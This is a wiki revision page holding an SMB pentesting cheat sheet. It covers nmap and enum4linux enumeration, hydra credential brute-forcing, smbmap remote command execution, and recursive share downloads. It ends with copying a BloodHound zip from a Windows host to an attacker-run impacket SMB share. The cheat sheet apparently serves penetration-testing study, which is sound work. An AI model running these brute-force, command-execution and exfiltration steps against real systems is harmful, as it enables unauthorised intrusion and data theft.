SMB: Difference between revisions

From RCATs
(making pretty)
No edit summary
Line 84: Line 84:
smb> put sample.txt
smb> put sample.txt


Download files recursively
Download files recursively below
 
smb> mask ""
smb> mask ""
smb> recurse ON
smb> recurse ON
smb> prompt OFF
smb> prompt OFF
smb> mget *
smb> mget *


We can use smbget from our local machine as well
smbget -R smb://<target-ip>/somedir -U username       # We can use smbget from our local machine as well
 
smbget -R smb://<target-ip>/somedir -U username


           Specify workgroup
           Specify workgroup
Line 100: Line 102:
         as anonymous user
         as anonymous user


smbget smb://<target-ip>/somedir -U anonymous
smbget smb://<target-ip>/somedir -U anonymous password: anonymous
password: anonymous


Transfer a file from windows to my attacker machine
Transfer a file from windows to my attacker machine
In your local kali make a directory that you want that file to go into.
In your local kali make a directory that you want that file to go into.



Revision as of 14:22, 21 January 2023

SMB Pentesting


SMB stands for Server Message Block. Default ports are 445, 139.

Ok what does it do? Glad you asked. It allows clients, like workstations, to communicate with a server like a share directory.

SMB Enumeration

Auto enum can be done with nmap like so. Pay attention here the port may be different but no all the time and of course the ip will be different.

nmap --script smb-brute -p 445 <target-ip>

nmap --script smb-enum-shares.nse,smb-enum-users.nse -p 445 <target-ip>

nmap --script smb-enum* -p 445 <target-ip>

nmap --script smb-protocols -p 445 <target-ip>

nmap --script smb-vuln* -p 445 <target-ip> Enum4Linux enumerates the users, share directories, etc.

enum4linux <target-ip> # Basic use.

enum4linux -a <target-ip> # All Enum.

enum4linux -v <target-ip> # Verbose.

enum4linux -u username -p password <target-ip> #Specify username and password this can get us even more information as we will have accessed that users share.

Smbmap

smbmap -H <target-ip> smbmap -H <target-ip> -R # Recursive lookup.

smbmap -u username -p password -H <target-ip> # Username and Password

smbmap -u username -p password -H <target-ip> -x 'ipconfig' # Execute a command

Brute Force Credentials hydra -l username -P passwords.txt <target-ip> smb hydra -L usernames.txt -p password <target-ip> smb

Connect with smbclient

smbclient -L 10.0.0.1

smbclient -N -L 10.0.0.1

smbclient -N -L \\\\10.0.0.1

smbclient -L 10.0.0.1 -U username

Anonymous

smbclient //10.0.0.1/somedir -N

smbclient "//10.0.0.1/some dir" -N # use of ""

smbclient //10.0.0.1/somedir -U username # Specify shared directory

smbclient -L 10.0.0.1 -W WORKGROUP -U username # Specify workgroup



                                                                 Commands in SMB

Once Connected we can find sensitive files or information and we love that as hackers dont we.

List Files

smb> ls

Download a file

smb> get sample.txt

Put a file can be txt,pdf,php etc..

smb> put sample.txt

Download files recursively below

smb> mask ""

smb> recurse ON

smb> prompt OFF

smb> mget *

smbget -R smb://<target-ip>/somedir -U username # We can use smbget from our local machine as well

         Specify workgroup

smbget -R smb://<target-ip>/somedir -w WORKGROUP -U username

        as anonymous user

smbget smb://<target-ip>/somedir -U anonymous password: anonymous

Transfer a file from windows to my attacker machine

In your local kali make a directory that you want that file to go into.

mk dir smb

Next we will run impacket-smbserver

sudo impacket-smbserver -smb2support share $(pwd)

Then we will transfer the file over to that share we just set up with impacket-smbserver.

powershell copy bloodhound.zip \\attackip\share\

I choose to show you a transfer of a bloodhound zip file which is super important when enumerating AD.